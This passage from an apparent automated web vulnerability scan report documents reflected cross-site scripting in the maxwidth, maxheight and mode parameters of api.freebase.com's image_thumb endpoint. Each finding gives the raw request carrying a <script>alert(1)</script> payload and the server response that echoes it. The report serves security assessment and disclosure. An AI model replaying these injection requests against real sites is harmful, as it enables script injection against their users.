Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:30:57 GMT
Server: Apache
X-Metaweb-Cost: cc=0.016, dt=0.017, mcs=0.0, mcu=0.0, tm=0.0, utime=0.016
Expires: Thu, 12 May 2011 13:30:58 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache02.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache02.p01.sjc1:8101;2011-05-12T13:30:57Z;0008
Content-Length: 389

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "maxwidth",
"value": "3219c68<script>alert(1)</script>0b3c41db23c"
},
"message": "Please enter an integer value"
}
],
"status": "400 Bad Request",
"transaction_id": "cache;cache02.p01.sjc1:8101;2011-05-12T13:30:57Z;0008"
}
2.48. http://api.freebase.com/api/trans/image_thumb/en/apple_inc [mode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/apple_inc

Issue detail

The value of the mode request parameter is copied into the HTML document as plain text between tags. The payload 79d15<script>alert(1)</script>9d176111042 was submitted in the mode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/apple_inc?maxwidth=32&maxheight=32&mode=fillcrop79d15<script>alert(1)</script>9d176111042 HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:31:25 GMT
Server: Apache
X-Metaweb-Cost: cc=0.012, dt=0.012, mcs=0.0, mcu=0.0, nivcsw=1, tm=0.0, utime=0.012
Expires: Thu, 12 May 2011 13:31:26 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache04.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache04.p01.sjc1:8101;2011-05-12T13:31:25Z;0067
Content-Length: 475

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "mode",
"value": "fillcrop79d15<script>alert(1)</script>9d176111042"
},
"message": "Value must be one of: fit; fill; fillcrop; fillcropmid (not u'fillcrop79d15<script>
...[SNIP]...
2.49. http://api.freebase.com/api/trans/image_thumb/en/gadget [maxheight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/gadget

Issue detail

The value of the maxheight request parameter is copied into the HTML document as plain text between tags. The payload 2859f<script>alert(1)</script>c6228f7744b was submitted in the maxheight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/gadget?maxwidth=32&maxheight=322859f<script>alert(1)</script>c6228f7744b&mode=fillcrop HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:31:19 GMT
Server: Apache
X-Metaweb-Cost: cc=0.012, dt=0.012, mcs=0.0, mcu=0.0, nivcsw=1, oublock=8, tm=0.0, utime=0.012
Expires: Thu, 12 May 2011 13:31:20 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache02.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache02.p01.sjc1:8101;2011-05-12T13:31:19Z;0027
Content-Length: 390

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "maxheight",
"value": "322859f<script>alert(1)</script>c6228f7744b"
},
"message": "Please enter an integer value"
}
],
"status": "400 Bad Request",
"transaction_id": "cache;cache02.p01.sjc1:8101;2011-05-12T13:31:19Z;0027"
}
2.50. http://api.freebase.com/api/trans/image_thumb/en/gadget [maxwidth parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/gadget

Issue detail

The value of the maxwidth request parameter is copied into the HTML document as plain text between tags. The payload e65d4<script>alert(1)</script>907a070820 was submitted in the maxwidth parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/gadget?maxwidth=32e65d4<script>alert(1)</script>907a070820&maxheight=32&mode=fillcrop HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:31:02 GMT
Server: Apache
X-Metaweb-Cost: cc=0.012, dt=0.012, mcs=0.0, mcu=0.0, tm=0.0, utime=0.012
Expires: Thu, 12 May 2011 13:31:03 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache03.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache03.p01.sjc1:8101;2011-05-12T13:31:02Z;0032
Content-Length: 388

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "maxwidth",
"value": "32e65d4<script>alert(1)</script>907a070820"
},
"message": "Please enter an integer value"
}
],
"status": "400 Bad Request",
"transaction_id": "cache;cache03.p01.sjc1:8101;2011-05-12T13:31:02Z;0032"
}
2.51. http://api.freebase.com/api/trans/image_thumb/en/gadget [mode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/gadget

Issue detail

The value of the mode request parameter is copied into the HTML document as plain text between tags. The payload db893<script>alert(1)</script>797f7dc6251 was submitted in the mode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/gadget?maxwidth=32&maxheight=32&mode=fillcropdb893<script>alert(1)</script>797f7dc6251 HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:31:35 GMT
Server: Apache
X-Metaweb-Cost: cc=0.012, dt=0.012, mcs=0.0, mcu=0.0, nivcsw=1, tm=0.0, utime=0.012
Expires: Thu, 12 May 2011 13:31:36 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache04.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache04.p01.sjc1:8101;2011-05-12T13:31:35Z;0044
Content-Length: 475

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "mode",
"value": "fillcropdb893<script>alert(1)</script>797f7dc6251"
},
"message": "Value must be one of: fit; fill; fillcrop; fillcropmid (not u'fillcropdb893<script>
...[SNIP]...
2.52. http://api.freebase.com/api/trans/image_thumb/en/google [maxheight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/google

Issue detail

The value of the maxheight request parameter is copied into the HTML document as plain text between tags. The payload 4d0a8<script>alert(1)</script>d2a62a0b628 was submitted in the maxheight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/google?maxwidth=32&maxheight=324d0a8<script>alert(1)</script>d2a62a0b628&mode=fillcrop HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:30:55 GMT
Server: Apache
X-Metaweb-Cost: cc=0.014, dt=0.015, mcs=0.0, mcu=0.0, oublock=8, tm=0.0, utime=0.014
Expires: Thu, 12 May 2011 13:30:56 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache04.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache04.p01.sjc1:8101;2011-05-12T13:30:55Z;0058
Content-Length: 390

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "maxheight",
"value": "324d0a8<script>alert(1)</script>d2a62a0b628"
},
"message": "Please enter an integer value"
}
],
"status": "400 Bad Request",
"transaction_id": "cache;cache04.p01.sjc1:8101;2011-05-12T13:30:55Z;0058"
}
2.53. http://api.freebase.com/api/trans/image_thumb/en/google [maxwidth parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/google

Issue detail

The value of the maxwidth request parameter is copied into the HTML document as plain text between tags. The payload e5519<script>alert(1)</script>3d346272cd9 was submitted in the maxwidth parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/google?maxwidth=32e5519<script>alert(1)</script>3d346272cd9&maxheight=32&mode=fillcrop HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:30:45 GMT
Server: Apache
X-Metaweb-Cost: cc=0.011, dt=0.012, mcs=0.0, mcu=0.0, tm=0.0, utime=0.011
Expires: Thu, 12 May 2011 13:30:46 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache02.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache02.p01.sjc1:8101;2011-05-12T13:30:45Z;0002
Content-Length: 389

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "maxwidth",
"value": "32e5519<script>alert(1)</script>3d346272cd9"
},
"message": "Please enter an integer value"
}
],
"status": "400 Bad Request",
"transaction_id": "cache;cache02.p01.sjc1:8101;2011-05-12T13:30:45Z;0002"
}
2.54. http://api.freebase.com/api/trans/image_thumb/en/google [mode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/google

Issue detail

The value of the mode request parameter is copied into the HTML document as plain text between tags. The payload 47e6c<script>alert(1)</script>6642222ca67 was submitted in the mode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/google?maxwidth=32&maxheight=32&mode=fillcrop47e6c<script>alert(1)</script>6642222ca67 HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:31:09 GMT
Server: Apache
X-Metaweb-Cost: cc=0.011, dt=0.012, mcs=0.0, mcu=0.0, oublock=8, tm=0.0, utime=0.011
Expires: Thu, 12 May 2011 13:31:10 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache01.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache01.p01.sjc1:8101;2011-05-12T13:31:09Z;0058
Content-Length: 475

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "mode",
"value": "fillcrop47e6c<script>alert(1)</script>6642222ca67"
},
"message": "Value must be one of: fit; fill; fillcrop; fillcropmid (not u'fillcrop47e6c<script>
...[SNIP]...
2.55. http://api.freebase.com/api/trans/image_thumb/en/google_chrome [maxheight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/google_chrome

Issue detail

The value of the maxheight request parameter is copied into the HTML document as plain text between tags. The payload 4e8bf<script>alert(1)</script>42751bc8816 was submitted in the maxheight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/google_chrome?maxwidth=32&maxheight=324e8bf<script>alert(1)</script>42751bc8816&mode=fillcrop HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:30:55 GMT
Server: Apache
X-Metaweb-Cost: cc=0.012, dt=0.012, mcs=0.0, mcu=0.0, tm=0.0, utime=0.012
Expires: Thu, 12 May 2011 13:30:56 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache03.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache03.p01.sjc1:8101;2011-05-12T13:30:55Z;0041
Content-Length: 390

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "maxheight",
"value": "324e8bf<script>alert(1)</script>42751bc8816"
},
"message": "Please enter an integer value"
}
],
"status": "400 Bad Request",
"transaction_id": "cache;cache03.p01.sjc1:8101;2011-05-12T13:30:55Z;0041"
}
2.56. http://api.freebase.com/api/trans/image_thumb/en/google_chrome [maxwidth parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/google_chrome

Issue detail

The value of the maxwidth request parameter is copied into the HTML document as plain text between tags. The payload 7e969<script>alert(1)</script>d8001a0cd8d was submitted in the maxwidth parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/google_chrome?maxwidth=327e969<script>alert(1)</script>d8001a0cd8d&maxheight=32&mode=fillcrop HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:30:45 GMT
Server: Apache
X-Metaweb-Cost: cc=0.011, dt=0.012, mcs=0.0, mcu=0.0, tm=0.0, utime=0.011
Expires: Thu, 12 May 2011 13:30:46 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache03.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache03.p01.sjc1:8101;2011-05-12T13:30:45Z;0002
Content-Length: 389

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "maxwidth",
"value": "327e969<script>alert(1)</script>d8001a0cd8d"
},
"message": "Please enter an integer value"
}
],
"status": "400 Bad Request",
"transaction_id": "cache;cache03.p01.sjc1:8101;2011-05-12T13:30:45Z;0002"
}
2.57. http://api.freebase.com/api/trans/image_thumb/en/google_chrome [mode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/google_chrome

Issue detail

The value of the mode request parameter is copied into the HTML document as plain text between tags. The payload ba731<script>alert(1)</script>fdadf40e93f was submitted in the mode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/google_chrome?maxwidth=32&maxheight=32&mode=fillcropba731<script>alert(1)</script>fdadf40e93f HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:31:09 GMT
Server: Apache
X-Metaweb-Cost: cc=0.012, dt=0.012, mcs=0.0, mcu=0.0, stime=0.001, tm=0.0, utime=0.011
Expires: Thu, 12 May 2011 13:31:10 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache04.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache04.p01.sjc1:8101;2011-05-12T13:31:09Z;0035
Content-Length: 475

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "mode",
"value": "fillcropba731<script>alert(1)</script>fdadf40e93f"
},
"message": "Value must be one of: fit; fill; fillcrop; fillcropmid (not u'fillcropba731<script>
...[SNIP]...
2.58. http://api.freebase.com/api/trans/image_thumb/en/google_i_o [maxheight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/google_i_o

Issue detail

The value of the maxheight request parameter is copied into the HTML document as plain text between tags. The payload 380fc<script>alert(1)</script>5b8117cdbae was submitted in the maxheight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/google_i_o?maxwidth=32&maxheight=32380fc<script>alert(1)</script>5b8117cdbae&mode=fillcrop HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:31:11 GMT
Server: Apache
X-Metaweb-Cost: cc=0.012, dt=0.012, mcs=0.0, mcu=0.0, tm=0.0, utime=0.012
Expires: Thu, 12 May 2011 13:31:12 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache03.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache03.p01.sjc1:8101;2011-05-12T13:31:11Z;0028
Content-Length: 390

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "maxheight",
"value": "32380fc<script>alert(1)</script>5b8117cdbae"
},
"message": "Please enter an integer value"
}
],
"status": "400 Bad Request",
"transaction_id": "cache;cache03.p01.sjc1:8101;2011-05-12T13:31:11Z;0028"
}
2.59. http://api.freebase.com/api/trans/image_thumb/en/google_i_o [maxwidth parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/google_i_o

Issue detail

The value of the maxwidth request parameter is copied into the HTML document as plain text between tags. The payload 3c299<script>alert(1)</script>31911d8bd05 was submitted in the maxwidth parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/google_i_o?maxwidth=323c299<script>alert(1)</script>31911d8bd05&maxheight=32&mode=fillcrop HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:30:56 GMT
Server: Apache
X-Metaweb-Cost: cc=0.012, dt=0.012, mcs=0.0, mcu=0.0, tm=0.0, utime=0.012
Expires: Thu, 12 May 2011 13:30:57 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache04.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache04.p01.sjc1:8101;2011-05-12T13:30:56Z;0065
Content-Length: 389

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "maxwidth",
"value": "323c299<script>alert(1)</script>31911d8bd05"
},
"message": "Please enter an integer value"
}
],
"status": "400 Bad Request",
"transaction_id": "cache;cache04.p01.sjc1:8101;2011-05-12T13:30:56Z;0065"
}
2.60. http://api.freebase.com/api/trans/image_thumb/en/google_i_o [mode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/google_i_o

Issue detail

The value of the mode request parameter is copied into the HTML document as plain text between tags. The payload 7a37d<script>alert(1)</script>0b43494b15d was submitted in the mode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/google_i_o?maxwidth=32&maxheight=32&mode=fillcrop7a37d<script>alert(1)</script>0b43494b15d HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:31:25 GMT
Server: Apache
X-Metaweb-Cost: cc=0.012, dt=0.012, mcs=0.0, mcu=0.0, tm=0.0, utime=0.011
Expires: Thu, 12 May 2011 13:31:26 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache03.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache03.p01.sjc1:8101;2011-05-12T13:31:25Z;0036
Content-Length: 475

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "mode",
"value": "fillcrop7a37d<script>alert(1)</script>0b43494b15d"
},
"message": "Value must be one of: fit; fill; fillcrop; fillcropmid (not u'fillcrop7a37d<script>
...[SNIP]...
2.61. http://api.freebase.com/api/trans/image_thumb/en/skype [maxheight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/skype

Issue detail

The value of the maxheight request parameter is copied into the HTML document as plain text between tags. The payload bc7ce<script>alert(1)</script>03297e6eafc was submitted in the maxheight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/skype?maxwidth=32&maxheight=32bc7ce<script>alert(1)</script>03297e6eafc&mode=fillcrop HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:31:19 GMT
Server: Apache
X-Metaweb-Cost: cc=0.017, dt=0.018, mcs=0.0, mcu=0.0, oublock=8, tm=0.0, utime=0.017
Expires: Thu, 12 May 2011 13:31:20 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache04.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache04.p01.sjc1:8101;2011-05-12T13:31:19Z;0057
Content-Length: 390

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "maxheight",
"value": "32bc7ce<script>alert(1)</script>03297e6eafc"
},
"message": "Please enter an integer value"
}
],
"status": "400 Bad Request",
"transaction_id": "cache;cache04.p01.sjc1:8101;2011-05-12T13:31:19Z;0057"
}
2.62. http://api.freebase.com/api/trans/image_thumb/en/skype [maxwidth parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/skype

Issue detail

The value of the maxwidth request parameter is copied into the HTML document as plain text between tags. The payload 47977<script>alert(1)</script>52d97883a5d was submitted in the maxwidth parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/skype?maxwidth=3247977<script>alert(1)</script>52d97883a5d&maxheight=32&mode=fillcrop HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:31:01 GMT
Server: Apache
X-Metaweb-Cost: cc=0.012, dt=0.012, mcs=0.0, mcu=0.0, oublock=8, tm=0.0, utime=0.012
